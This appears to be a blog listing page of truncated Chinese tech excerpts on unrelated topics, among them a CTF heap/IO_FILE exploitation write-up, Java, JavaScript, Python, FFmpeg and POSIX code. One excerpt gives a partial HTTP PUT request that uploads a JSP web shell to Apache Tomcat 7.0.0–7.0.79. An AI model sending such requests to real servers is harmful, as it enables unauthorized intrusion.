之前写过一篇 IO_FILE--leak 任意读,但是在学习的时候偷懒了,没有深入去看,这次碰到 winmt 师傅出的题,就傻眼了,故再写一篇博客来记录一下. 例题 ctfshow Incomplete Menu : 洞在 edit 里,可以超过 size 进行一个置零的操作. 这里还是考虑利用 _IO_2_1_stdout_ 来泄露 libc 基址.这里就出现了一个在我上篇文章中忽略的知识点.上一篇文章是通过改 flag 的一系列操作来进行,而 _IO_2_1_stdout_ 还有另一种修改方…

package com.cn.test.string; public class StringTest { public static void main(String[] args) { String str1 = getStringSum("999999999999999999999999999999999999999999999999999999999999999999999999999999","911911111111111111111111111111111111…

Apache Tomcat 7.0.0~7.0.79 直接发送以下数据包即可在Web根目录写入shell: PUT /1.jsp/ HTTP/1.1 Host: 192.168.49.2:8080 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type:…

var Stack = (function(){ var items = new WeakMap(); //先入后出,后入先出 class Stack{ constructor(){ items.set(this,[]); } push(ele){ //入栈 var ls = items.get(this); ls.push(ele); } pop(){ //出栈 var ls = items.get(this); return ls.pop(); } size(){ //获取栈的长度 var…

用类方法和静态方法实现:一个是追加写文件一行内容,一个是读指定行号的内容   #coding=utf-8   class handle_file(object):     def __init__(self,file_path):         self.file_path=file_path           @classmethod     def write_file(cls,file_path,content):         with open(file_path,'a') as…

我们每天都会收到拥有APP创意的人们的电话和邮件,他们想知道把这样的APP做出来需要多少钱.在Calvium,我们尽可能帮助他们,但有时候 做这样的报价真的很难.询问一款APP的价值,就和询问一条绳子的长度一样(译者注:意思是不知道明确的范围).因此,尽可能多地阐明你的想法尤为重要, 并且最好拥有一份产品计划书来说明你的想法. 许多人只有他们创意的基本思路,却想先把这些告诉给工程师,利用他们在行业领域的专业知识来充实他们的想法.这很好!许多代理公司都提供日结算服务或者是咨询服务,如果你还不自信,…

void SrcToDest(char* pSrc, char* pDest,unsigned int nSrcWidth, unsigned int nSrcHeight, AVPixelFormat srcFormat, unsigned int nDestWidth, unsigned int nDestHeight, AVPixelFormat destFormat) { SwsContext* pConvert_ctx = NULL; AVFrame* pFrameIn = NULL;…

在写完上一篇文章后,发现了一个问题: 那就是编写的插件无法实时预览. 在学习了Slate之后,我找到了方法: 重写SynchronizeProperties函数 头文件中添加: #if WITH_EDITOR UFUNCTION() virtual void SynchronizeProperties() override; #endif 因为只需要在编辑器中运行,所以加上了#if WITH_EDITOR cpp文件中添加: #if WITH_EDITOR void UMiniMap::Sync…

1常用基础函数 alert函数:显示一个警告对话框,包括一个OK按钮.这就是传说中的警告框,此框一弹,世界就清静了.举例:   alert("我一旦出现,之前出现的就算了,我屁股后面你们就歇菜吧,谁也别想执行") confirm(message)函数:显示一个确认对话框,包括OK.Cancel按钮.这东西我们经常用到,例如提交表单.或者加载什么函数时,把这个confirm()的返回值(true或false)付给变量或者直接就丢给if来个判断,嗯,你可以自己接着yy了 prompt(te…

Posix读写锁 int pthread_rwlock_init(pthread_rwlock_t *restrict rwlock, const pthread_rwlockattr_t *restrict attr); int pthread_rwlock_destroy(pthread_rwlock_t *rwlock); int pthread_rwlock_rdlock(pthread_rwlock_t *rwlock); int pthread_rwlock_wrlock(pthre…